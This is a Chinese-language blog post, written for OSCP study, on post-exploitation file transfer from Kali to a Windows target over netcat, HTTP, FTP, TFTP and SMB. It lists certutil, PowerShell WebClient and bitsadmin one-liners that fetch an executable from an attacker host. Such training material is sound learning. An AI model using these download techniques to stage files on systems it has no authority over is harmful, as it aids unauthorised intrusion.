將檔案從Linux傳輸到Windows(後期利用)
準備考 OSCP,發現有意思的資料傳輸方式,特此練習一遍
參考連結:https://blog.ropnop.com/transferring-files-from-kali-to-windows/
將檔案從Linux傳輸到Windows(後期利用)
2019年3月30日17:29:09 【原創】
1. 簡介
-
簡介
無論那種情況,我們有時候會需要從 linux 系統傳輸資料到 windows 系統,尤其是檔案。但是往往 nc 沒有同時存在於雙方系統上,此時就需要其他的簡便方法來操作。 -
nc 檔案傳輸
nc 使用:傳送門 – Kali Linux滲透測試 003 基本工具–NC• 傳輸檔案( B->A ) A:root@kali:~# nc -lp 4444 > 2.mp4 B:root@metasploitable:~# nc -nv 192.168.1.100 4444 < AWVS\ 01.avi -q 1 或(A->B) A:root@kali:~# nc -q 1 -lp 4444 < 2.mp4 B:root@metasploitable:~# nc -nv 192.168.1.100 4444 > 3.mp4 • 傳輸目錄 A:root@kali:~# tar zcvf - testdir/ | nc -lp 4444 -q 1 B:root@metasploitable:~# nc 192.168.1.100 4444 | tar zxvf -
2. HTTP
-
啟動 apache 伺服器
root@kali:~# /etc/init.d/apache2 start [ ok ] Starting apache2 (via systemctl): apache2.service. root@kali:~# netstat -tulnp | grep 80 tcp6 0 0 :::80 :::* LISTEN 1248/apache2
可以看到開啟 80 埠 ,如果使用 apache 環境,需要經檔案複製進 /var/www/html/ 目錄
root@kali:~# cp team.exe /var/www/html/
或者 使用 python 自帶的模組搭建簡單的 HTTP 環境
如果不需要再使用,可以先停止 apache 服務root@kali:~# /etc/init.d/apache2 stop root@kali:~# python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ...
此時 HTTP 監聽的根目錄是執行此命令當前所在的目錄(我的環境是 root 家目錄)
-
進行檔案下載
-
使用瀏覽器進行下載
瀏覽器訪問 http://10.10.10.166/team.exe
-
windows 環境可以使用 certutil.exe 工具
PS C:\Users\John> certutil.exe -urlcache -split -f "http://10.10.10.166/team.exe" team.exe
-
windows 環境可以使用 powershell 環境
PS C:\Users\John> powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.166:8000/team.exe','team.exe')"
-
另外還有 bitsadmin 工具
PS C:\Users\John> bitsadmin /transfer n http://10.10.10.166:8000/team.exe D:\PSTools.zip
參考資料:
-
linux 環境
root@ubuntu:~# curl http://10.10.10.166:8000/team.exe > team.exe root@ubuntu:~# wget http://10.10.10.166:8000/ssh_login.txt
-
3. FTP
-
啟動
-
使用 python 模組
# 使用前需要先安裝 python 模組 root@kali:~# apt-get install python-pyftpdlib root@kali:~# python -m pyftpdlib -p 21
如果要授予匿名使用者寫入許可權,請同時新增該-w標誌。
-
使用 MSF
Module options (auxiliary/server/ftp): Name Current Setting Required Description ---- --------------- -------- ----------- FTPPASS no Configure a specific password that should be allowed access FTPROOT /tmp/ftproot yes The FTP root directory to serve files from FTPUSER no Configure a specific username that should be allowed access PASVPORT 0 no The local PASV data port to listen on (0 is random) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 21 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) Auxiliary action: Name Description ---- ----------- Service msf5 auxiliary(server/ftp) > set FTPROOT /root msf5 auxiliary(server/ftp) > run -j [*] Auxiliary module running as background job 0. [*] Started service listener on 0.0.0.0:21 [*] Server started.
進行在後臺執行,結束可以使用 jobs -k <id>
-
-
下載,使用 anonymous 賬戶登入
PS C:\Users\John> ftp 10.10.10.166 連線到 10.10.10.166。 220 FTP Server Ready 500 'OPTS UTF8 ON': command not understood. 使用者(10.10.10.166:(none)): anonymous 331 User name okay, need password... 密碼: 230 Login OK ftp> dir 200 PORT command successful. 425 Can't build data connection ftp> ls 200 PORT command successful. 500 'NLST ': command not understood. ftp> binary 200 Type is set ftp> dir 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls total 1888 drwxr-xr-x 2 0 0 512 Jan 1 2000 lmg drwxr-xr-x 2 0 0 512 Jan 1 2000 Downloads -rwxr-xr-x 2 0 0 512 Jan 1 2000 team.exe -rw-r--r-- 1 0 0 1515 Jan 1 2000 .viminfo 226 Transfer complete. ftp: 收到 1903 位元組,用時 0.14秒 13.59千位元組/秒。 ftp> get team.exe 200 PORT command successful. 150 Opening BINARY mode data connection for team.exe 226 Transfer complete. ftp: 收到 4803401 位元組,用時 0.05秒 102200.02千位元組/秒。 ftp>
也可以瀏覽器 直接訪問 ftp:// 10.10.10.166
另外,如果是命令列環境,可以一步直接下載# 建立檔案:ftp_commands.txt open 10.10.10.166 anonymous whatever binary get team.exe bye # 執行命令 PS C:\Users\John> ftp -s:ftp_commands.txt
4. TFTP
-
啟動
-
預設安裝在Windows XP中
-
MSF
Module options (auxiliary/server/tftp): Name Current Setting Required Description ---- --------------- -------- ----------- OUTPUTPATH /tmp yes The directory in which uploaded files will be written. SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 69 yes The local port to listen on. TFTPROOT /tmp yes The TFTP root directory to serve files from Auxiliary action: Name Description ---- ----------- Service msf5 auxiliary(server/tftp) > set TFTPROOT /root TFTPROOT => /root msf5 auxiliary(server/tftp) > run -j [*] Auxiliary module running as background job 1. [*] Starting TFTP server on 0.0.0.0:69... [*] Files will be served from /root [*] Uploaded files will be saved in /tmp
-
-
下載
-
windows 10 環境預設帶有 tftp 客戶端,如果不帶,就可以使用 pkgmgr /iu:“TFTP” 命令
PS C:\Users\John> tftp -i 10.10.10.166 GET team.exe
-
5. SMB
-
在linux啟動 samba服務
root@kali:~# git clone https://github.com/CoreSecurity/impacket root@kali:~# cd impacket/ root@kali:~/impacket# python3 setup.py install root@kali:~/impacket# cd examples/ root@kali:~/impacket/examples# python smbserver.py ROPNOP /root Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed
在一行中,我們已經啟動並執行了SMB共享。您可以smbclient從Linux 確認一下是否已經開啟:
root@kali:~# smbclient -L 10.10.10.166 --no-pass Sharename Type Comment --------- ---- ------- ROPNOP Disk IPC$ Disk Reconnecting with SMB1 for workgroup listing. Connection to 10.10.10.166 failed (Error NT_STATUS_CONNECTION_REFUSED) Failed to connect with SMB1 -- no workgroup available
或者在 windows 使用 net view 看一下
PS C:\Users\John> net view \\10.10.10.166
相關文章
- 將本地檔案傳輸到GitHubGithub
- Windows&Linux檔案傳輸方式總結WindowsLinux
- 幾種從Windows上傳檔案到Linux系統的方法WindowsLinux
- Linux 檔案傳輸Linux
- 如何傳輸檔案到linux伺服器?Linux伺服器
- Linux scp 後臺執行傳輸檔案Linux
- 透過二維碼傳輸檔案到linuxLinux
- winscp傳檔案到windows,winscp傳檔案到windows有三步Windows
- Linux與windows檔案傳輸詳解及例項LinuxWindows
- windows如何傳檔案到linux虛擬機器WindowsLinux虛擬機
- 幾種windows到linux上傳檔案的方式WindowsLinux
- 前端傳輸檔案到後端報錯問題前端後端
- Mac Linux檔案互相傳輸MacLinux
- 如何將超大檔案傳輸給別人,超大檔案如何傳輸呢?
- 使用scp將linux伺服器中的檔案傳到windows本地主機上Linux伺服器Windows
- Azure Terraform(十二)利用 Terraform 將檔案上傳到 Azure Blob StorageORM
- 兩臺linux的檔案傳輸Linux
- win10系統怎麼將檔案從USB驅動器傳輸到PC上Win10
- windows共享到linux系統檔案WindowsLinux
- 資料傳輸 | 利用 DTLE 將 MySQL 資料同步到 DBLEMySql
- 從Windows到LinuxWindowsLinux
- windows伺服器間自動傳輸檔案Windows伺服器
- 上傳執行sql檔案到linuxSQLLinux
- 什麼是極速檔案傳輸,極速檔案傳輸如何進行大檔案傳輸
- linux windows遠端傳輸工具LinuxWindows
- sftp 傳輸檔案FTP
- scp 傳輸檔案
- 【Linux 工具】伺服器檔案傳輸利器 lrzszLinux伺服器
- xftp實現linux伺服器傳輸檔案FTPLinux伺服器
- Linux——檔案傳輸協議知識點梳理Linux協議
- 大檔案如何傳輸,大檔案的傳輸方式有哪些?
- Linux 下用 SCP 無需輸入密碼傳輸檔案Linux密碼
- AnyTrans使用教程:將照片從 Mac 傳輸到 iPhone 的方法MaciPhone
- 【多檔案自平衡雲傳輸】使用展示 —— 檔案傳輸系統
- 檔案傳輸協議的五種安全檔案傳輸替代方案協議
- QT從入門到入土(九)——TCP/IP網路通訊(以及檔案傳輸)QTTCP
- wtfpd檔案傳輸使用
- 從rm到linux虛擬檔案系統Linux